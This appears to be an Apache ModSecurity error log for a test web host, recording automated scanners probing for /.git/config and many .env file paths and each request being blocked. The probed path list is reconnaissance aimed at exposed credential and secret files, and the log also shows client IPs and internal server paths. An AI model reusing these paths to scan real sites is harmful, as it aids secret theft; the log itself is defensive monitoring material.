[Mon Feb 03 12:38:35.750083 2025] [:error] [pid 903227] [client 34.219.159.38:35658] [client 34.219.159.38] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z6CquwLbe95nXH84dKtVxgAAAAM"]
[Mon Feb 03 12:38:35.753198 2025] [:error] [pid 903227] [client 34.219.159.38:35658] [client 34.219.159.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z6CquwLbe95nXH84dKtVxgAAAAM"]
[Mon Feb 03 12:38:35.753677 2025] [:error] [pid 903227] [client 34.219.159.38:35658] [client 34.219.159.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z6CquwLbe95nXH84dKtVxgAAAAM"]
[Sat Feb 08 09:41:49.906935 2025] [:error] [pid 1012648] [client 45.148.10.235:50760] [client 45.148.10.235] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z6cYzX6yKq4w0bofF2hh6gAAAAE"]
[Sat Feb 08 09:41:49.909302 2025] [:error] [pid 1012648] [client 45.148.10.235:50760] [client 45.148.10.235] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z6cYzX6yKq4w0bofF2hh6gAAAAE"]
[Sat Feb 08 09:41:49.909772 2025] [:error] [pid 1012648] [client 45.148.10.235:50760] [client 45.148.10.235] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z6cYzX6yKq4w0bofF2hh6gAAAAE"]
[Sat Feb 08 09:41:50.048671 2025] [:error] [pid 1012647] [client 45.148.10.235:50764] [client 45.148.10.235] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z6cYzqZJGcrIdR3jb3sqCQAAAAA"]
[Sat Feb 08 09:41:50.049597 2025] [:error] [pid 1012647] [client 45.148.10.235:50764] [client 45.148.10.235] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z6cYzqZJGcrIdR3jb3sqCQAAAAA"]
[Sat Feb 08 09:41:50.050212 2025] [:error] [pid 1012647] [client 45.148.10.235:50764] [client 45.148.10.235] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z6cYzqZJGcrIdR3jb3sqCQAAAAA"]
[Sat Feb 08 09:41:50.562152 2025] [:error] [pid 1012664] [client 45.148.10.235:50794] [client 45.148.10.235] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z6cYzpb9xITnTJA1OeTIPQAAAAU"]
[Sat Feb 08 09:41:50.562807 2025] [:error] [pid 1012664] [client 45.148.10.235:50794] [client 45.148.10.235] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z6cYzpb9xITnTJA1OeTIPQAAAAU"]
[Sat Feb 08 09:41:50.563255 2025] [:error] [pid 1012664] [client 45.148.10.235:50794] [client 45.148.10.235] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z6cYzpb9xITnTJA1OeTIPQAAAAU"]
[Sat Feb 08 09:41:50.659524 2025] [:error] [pid 1012649] [client 45.148.10.235:50796] [client 45.148.10.235] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z6cYzrdSMms3sR57xhu__wAAAAI"]
[Sat Feb 08 09:41:50.660113 2025] [:error] [pid 1012649] [client 45.148.10.235:50796] [client 45.148.10.235] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z6cYzrdSMms3sR57xhu__wAAAAI"]
[Sat Feb 08 09:41:50.660544 2025] [:error] [pid 1012649] [client 45.148.10.235:50796] [client 45.148.10.235] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z6cYzrdSMms3sR57xhu__wAAAAI"]
[Sat Feb 08 09:41:50.782077 2025] [:error] [pid 1012651] [client 45.148.10.235:50800] [client 45.148.10.235] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /login/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z6cYzgAZ8GW85HFw1xnBCAAAAAQ"]
[Sat Feb 08 09:41:50.782772 2025] [:error] [pid 1012651] [client 45.148.10.235:50800] [client 45.148.10.235] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z6cYzgAZ8GW85HFw1xnBCAAAAAQ"]
[Sat Feb 08 09:41:50.783204 2025] [:error] [pid 1012651] [client 45.148.10.235:50800] [client 45.148.10.235] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z6cYzgAZ8GW85HFw1xnBCAAAAAQ"]
[Sat Feb 08 09:41:50.873771 2025] [:error] [pid 1012650] [client 45.148.10.235:50816] [client 45.148.10.235] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z6cYzj2C4UdOfgg5hqhrIgAAAAM"]
[Sat Feb 08 09:41:50.874429 2025] [:error] [pid 1012650] [client 45.148.10.235:50816] [client 45.148.10.235] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z6cYzj2C4UdOfgg5hqhrIgAAAAM"]
[Sat Feb 08 09:41:50.874969 2025] [:error] [pid 1012650] [client 45.148.10.235:50816] [client 45.148.10.235] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z6cYzj2C4UdOfgg5hqhrIgAAAAM"]
[Sat Feb 08 09:41:50.992220 2025] [:error] [pid 1012648] [client 45.148.10.235:50832] [client 45.148.10.235] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z6cYzn6yKq4w0bofF2hh6wAAAAE"]
[Sat Feb 08 09:41:50.992798 2025] [:error] [pid 1012648] [client 45.148.10.235:50832] [client 45.148.10.235] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z6cYzn6yKq4w0bofF2hh6wAAAAE"]
[Sat Feb 08 09:41:50.993293 2025] [:error] [pid 1012648] [client 45.148.10.235:50832] [client 45.148.10.235] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z6cYzn6yKq4w0bofF2hh6wAAAAE"]
[Sat Feb 08 09:41:51.099437 2025] [authz_core:error] [pid 1012647] [client 45.148.10.235:50846] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Sat Feb 08 09:41:51.196262 2025] [:error] [pid 1014088] [client 45.148.10.235:50860] [client 45.148.10.235] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z6cYz80NMB6Tc4AK-RSVWAAAAAc"]
[Sat Feb 08 09:41:51.196844 2025] [:error] [pid 1014088] [client 45.148.10.235:50860] [client 45.148.10.235] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z6cYz80NMB6Tc4AK-RSVWAAAAAc"]
[Sat Feb 08 09:41:51.197346 2025] [:error] [pid 1014088] [client 45.148.10.235:50860] [client 45.148.10.235] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z6cYz80NMB6Tc4AK-RSVWAAAAAc"]
[Sat Feb 08 10:52:20.167159 2025] [:error] [pid 1012651] [client 194.233.73.109:42846] [client 194.233.73.109] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z6cpVAAZ8GW85HFw1xnBDAAAAAQ"]
[Sat Feb 08 10:52:20.167862 2025] [:error] [pid 1012651] [client 194.233.73.109:42846] [client 194.233.73.109] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z6cpVAAZ8GW85HFw1xnBDAAAAAQ"]
[Sat Feb 08 10:52:20.168323 2025] [:error] [pid 1012651] [client 194.233.73.109:42846] [client 194.233.73.109] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z6cpVAAZ8GW85HFw1xnBDAAAAAQ"]
[Sun Feb 09 09:03:32.277046 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env_example"] [unique_id "Z6hhVAYgn2qAukdNQqsmlAAAAAE"]
[Sun Feb 09 09:03:32.277594 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env_example"] [unique_id "Z6hhVAYgn2qAukdNQqsmlAAAAAE"]
[Sun Feb 09 09:03:32.278099 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env_example"] [unique_id "Z6hhVAYgn2qAukdNQqsmlAAAAAE"]
[Sun Feb 09 09:03:34.776334 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "Z6hhVgYgn2qAukdNQqsmlQAAAAE"]
[Sun Feb 09 09:03:34.776750 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "Z6hhVgYgn2qAukdNQqsmlQAAAAE"]
[Sun Feb 09 09:03:34.777204 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "Z6hhVgYgn2qAukdNQqsmlQAAAAE"]
[Sun Feb 09 09:03:37.151169 2025] [authz_core:error] [pid 1033859] [client 193.41.206.176:43204] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Sun Feb 09 09:03:39.754914 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "Z6hhWwYgn2qAukdNQqsmlwAAAAE"]
[Sun Feb 09 09:03:39.755334 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "Z6hhWwYgn2qAukdNQqsmlwAAAAE"]
[Sun Feb 09 09:03:39.755844 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "Z6hhWwYgn2qAukdNQqsmlwAAAAE"]
